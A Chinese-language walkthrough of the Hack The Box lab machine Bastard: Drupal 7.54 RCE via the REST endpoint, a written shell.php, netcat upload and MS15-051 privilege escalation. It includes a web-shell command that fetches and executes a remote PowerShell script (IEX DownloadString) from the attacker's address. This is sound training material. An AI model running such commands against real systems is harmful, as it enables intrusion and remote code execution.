Ms08067安全实验
这次挑战的是 HTB 的第7台靶机:Bastard
技能收获:
PHP Unserilaize
CMS Version Identify
Windows privilege escalation :Sherlock
Bastard IP:10.10.10.9
Kali IP:10.10.14.23
发现开启了80(IIS),访问之
看起来是drupal cms,访问 robots.txt ,发现版本变更文件
版本:Drupal 7.54
searchsploit drupal 7.x
该版本存在 rce ,编辑 exploit
该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。
通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit
没有反应,挂上 burpsuite 看看
设置 exp 的target为 burp 的监听端口
依然没回应,那应该是缺少php包,未成功发送
检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php
利用 session.json 可以伪造会话,成功登录
已知目标是 x64 的系统,我们上传 nc.exe
下载地址:https://eternallybored.org/misc/netcat/
给 exp 添加一个文件上传功能,也可以使用 *** b文件共享,使用上传
Sherlock是一个在Windows下用于本地提权的PowerShell脚本
http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -
提示 ms15-051 , 利用之
提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
上传并运行
建立 nc 会话
至此完成
Drupal 7.x RCE 漏洞分析 附EXP:
https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/
<br>
MS08067实验室官网:www.ms08067.com
公众号:"?Ms08067安全实验室"
Ms08067安全实验室目前开放知识星球:?WEB安全攻防,内网安全攻防,Python安全攻防,KALI?Linux安全攻防,二进制逆向入门
最后期待各位小伙伴的加入!
在win7系统里,我们下载程序的时候,有时会被防火墙给阻止不让我们安装,这时我们就需要去把防火墙给关了,但也有用户不知道在哪设置防火墙的,那么win7防火墙在哪设置呢,下面小编给大家分享win7防...
男士剃须刀什么牌子好用(手动刮胡刀哪个牌子好) 许多情况下,大家让你的点评是“没精打采” ,仅仅由于你下颌上面有两根秀发。破旧不堪的下颌非常容易给人一种消沉的宅男宅女,不论是在职人员场還是在日常生活...
阿里旺旺1.00.0912014/3/13 15:56 不能添加管理员URL : http://**.***.com/_common/jwplayer/player.swf?debug=(fun...
牙龈出血是什么原因(身体缺少它难怪牙龈出血) 牙龈出血是问题你遇到过吗?也许有一些人对于这个症状听说过,但是自己并没有经历过,牙龈出血的原因是很复杂...
在店面沒有转换的情况下,有的逐渐猜疑自身店面、有的换品实际操作、有的换店面商品,可到最终转换還是不开朗。 那麼难题出在哪儿呢?博士研究生店家和大伙儿谈一谈这转换率的关键点! 一、店面店...
2021年惊蛰是在2021年三月五日,也就是农历正月二十二,在很多人看来,正月出生的宝宝都是非常有福气的,而很多准妈妈的预产期也正好就是在2021年惊蛰这一天,接下来大家就和小编一起了解一下2021年...